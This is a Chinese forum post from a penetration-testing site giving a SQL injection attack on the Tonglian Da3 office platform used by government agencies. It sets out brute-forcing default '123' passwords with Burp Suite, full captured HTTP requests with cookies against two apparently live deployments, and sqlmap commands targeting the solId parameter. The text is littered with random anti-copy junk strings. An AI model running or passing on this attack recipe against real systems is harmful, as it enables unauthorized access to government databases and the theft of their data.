中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

4 Z2 r3 A/ t* ?* d" g
9 c6 s& m" g5 l

* T. c, Q" C3 B6 T V

: x7 {& y: h0 V6 Y1 O' l 平台简介: Q) k1 A' { i) K; n5 Z1 R) f

1 e+ ^" N j: C5 O; w! k5 \+ k

7 n M$ G! _: J  ( i! z3 l3 M9 f: W1 R+ |) V3 J. j

* N) g* I X7 W- ^, L0 B& i9 P$ B

8 Q. M: U$ z) g1 q2 d 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% s' Y+ e5 A, t9 w+ `7 t2 N+ t同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" B4 U" o8 s3 H' H% i3 J 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 9 S$ O3 U1 a! U! |8 Z2 J4 B+ o

5 |; o; l0 h( C* A; m1 I6 J

4 F; P3 p% z0 L' J% U   % c9 G1 l8 |, C7 j

: }0 W5 ~% @. X; x9 D% n" W

1 f$ V; i3 i( [' m 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:2 g' d" b' n1 p$ J

: G) u) {3 K: a. P% Z" J

, e; V" d% L. Z8 V8 i2 T) [   2 E( V. d+ t: d) I: E% q

8 Z6 J4 t) W; }7 D9 t0 o, p7 R" ~

' z. s: Z8 I: Q9 N# C; z http://1.1.1.1:7197/cap-aco/#(案例2-) 9 H" t2 ~% R z) c- X% w

9 m$ k+ E6 j) h3 J+ s( Q

0 P V9 ]2 i' A0 F; \; K http://www.XXOO.com (案例1-官网网站) 6 S! Q& u9 g4 h$ v' H

7 }' `3 L! R; c2 O0 p) P; ?: F2 J

7 Z3 K. g+ y0 Q: O   " m Q1 y9 n9 n* f

3 p% L+ _" G2 p+ j7 W

' S3 k9 d1 H& ~' s, Z% H w% q8 h 漏洞详情: 5 r I. [' W4 a* B) u5 I: n; ~

- u; |/ s. p# W$ ^9 s' Z

% J b% }) D/ g r$ S  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 6 W1 e) \( L: R4 L; w( y' W# z

# r3 w) ?' h* S: u+ w. w

% q; e& u* i6 Y      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 1 _. r9 H" B/ C; n3 _: P5 {$ r

. t) O5 F: _0 T8 J/ i

# O2 s1 ` Y7 H4 f$ v   4 x& I, M( Z) t! B" D6 _3 s. k5 Q. N

' F( b5 l/ [8 ?3 k& H) f. T/ m

- \2 O! D4 S/ H9 G   $ |3 V9 u: q4 K8 E

6 l8 F) N1 j/ v, O3 H1 [

1 P8 a+ z* H4 I; K status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: ! P3 N6 R( }6 s

7 K4 o7 y* c+ v' i

7 ]9 o( N& K6 y3 D' M+ L5 | Y 1、案例1-官方网站+ l- b$ |& e( @# R Q

/ }# Q0 P/ ?/ X6 F1 [

) {: z4 h% m8 J9 Y( e% C" U8 d GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 # [! Q8 Q* r; v" r- Q4 v2 z4 \

9 K4 Y- M L7 Y& U" D7 c9 J

- Q9 m" K/ q( C$ O& |, L Host: www.XXOO.com$ z) N/ V; h; z* t+ W" {/ B& w

% m) z X. y4 S# T( ?) L' ^$ D( b& |

' [2 s' p) Q: s Proxy-Connection: Keep-Alive! Y6 h/ h6 W/ A/ `: Y9 v

, J4 m- w. y' Z7 m, }6 G

$ X8 Z( Q( Y$ v) b Accept: application/json, text/javascript, */*; q=0.01 8 d! e" S6 \( H. p4 u% I

' T! s* s4 a0 I0 C. o' ?

& U# L1 \5 Z& r Accept-Language: zh-CN 3 _# _3 G& o4 G2 m9 a' O% h" c

* ~; c+ h: I' ~: [* X5 b

" y* g% ~3 q; }: F' n0 a Content-Type: application/json 9 f9 d( z1 |" E

! m$ v# v1 X& y% e! b+ `

# d' ^$ ~; X \& y; B User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 0 e% S' g! X8 E# d

0 I. M6 E( Y) p* ]) D1 {' n+ M+ }

@5 I# c& G. S& E5 m X-Requested-With: XMLHttpRequest : G R$ m. \& H- I

4 @ s" K2 J( [" c: E: P" X

5 i& F6 [2 f: L& ^+ u/ k; X: R$ k Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 O* e& U" x: Z, w v/ h

1 P8 @9 l# j/ K2 W1 d, I6 V5 y

: R2 O/ K) i/ f1 U# g Accept-Encoding: gzip, deflate, sdch ! X+ S" H4 M8 |

% {5 }0 G, k6 |# a9 j! ]5 q

. ~; I/ ^* |1 h) ? Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e: q3 k& y D5 i3 E' \% D

, g3 O, M3 X+ I9 \

@: {) [2 ~5 V% d$ }& T& D$ R 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 4 X# \0 H5 O+ ~& u7 D* U

6 M) }! P. } F4 X8 P) }0 ~

9 [9 z( J0 P2 P; {2 y( x5 z   . ^9 u+ v7 c3 }7 M5 q4 B

& ~6 Y' H" N# _ Z

. h# d L; \4 s0 p* z  ; N- D+ b8 c- C+ K- k4 D) q

9 Q- |/ {6 A4 J4 K

8 o! R2 m! I$ Y: \  / s8 x1 B7 d; m/ V

, I7 T. A* I9 O

) V( S/ L) f/ g5 K# K i  + a9 N/ \7 @6 u) x' j

0 ~, n! E8 X2 G# _3 b0 | _

3 x" L' g. H2 z ^  0 {( z& V( c" w) S, F" F2 r

& w" ? P0 T! L5 v4 o4 ?

; R1 Y, N- l3 j% u 2、案例2-某天河云平台6 b4 z' x2 p0 Q6 R

9 D* _2 H2 c, K) |" d" D$ x

5 O3 K; B8 R5 U* f4 [% S! q6 _, M GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.12 h. A/ O) b& I2 d

+ d8 I* j7 b4 Z. Q7 U- P6 m

- E! x, R9 G9 y1 X- @9 ]- } Host: 1.1.1.:7197. U2 ?( x; g, y* v k7 A

; |( d0 k! ?7 Q L/ T0 f

& x, D% t' b9 h4 d Accept: application/json, text/javascript, */*; q=0.01! d) Q8 }4 [4 g1 h: l4 \0 L" G2 n1 [

- G/ N: R! V5 P# f1 a& b) Z

6 }/ T8 I: ]3 ^2 c C X-Requested-With: XMLHttpRequest 5 `$ e" m1 j3 [# P% F# a% Z$ s

, W P2 H3 r( b4 h

3 o5 J9 m' s- K5 k3 f/ d% Y: ^ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 # Y8 z9 u! U3 N) N2 x8 [

b9 B" g: t. S3 O1 a

0 u' f, s7 V. v# c9 p" i! r* n3 b Content-Type: application/json 7 W7 b, ]" }/ F+ H3 S' D

1 u! v9 k3 F$ V; y

: r3 P; w& x# J Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ( M! j* E/ d/ q5 | ^+ ], f

5 k) z X# D+ N4 V' s9 a

2 p& \7 R8 W1 Z% Z2 n- A. v/ Y; s Accept-Language: zh-CN,zh;q=0.8 # K$ K! @! `2 z: |5 [" |0 r1 V

7 u3 Y" f# V3 X

1 I/ i8 n' j9 Z2 p$ I7 T Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1( {5 c. d: k; U( B

! m: s. z* h, w4 U+ n$ k! L

) L( P4 o; B/ J& e# ]! U4 m9 C Connection: close9 r% s) i- `' h6 r/ n( i, U9 T% p

1 h: [! [# a3 j( d9 B

$ O) h, e5 z( Y/ s 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: + x5 a: T+ T3 E% F6 ?8 K4 a. Y

4 V; _8 P0 i/ J6 U7 I, J T9 R

. h/ W {3 w% u& b8 T   ; C8 M; A2 T8 A

$ T, i* r7 {& R7 a$ }, d

" O, f5 S. T t% r+ [1 }
: G6 g2 I5 J% Y1 ]$ m






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2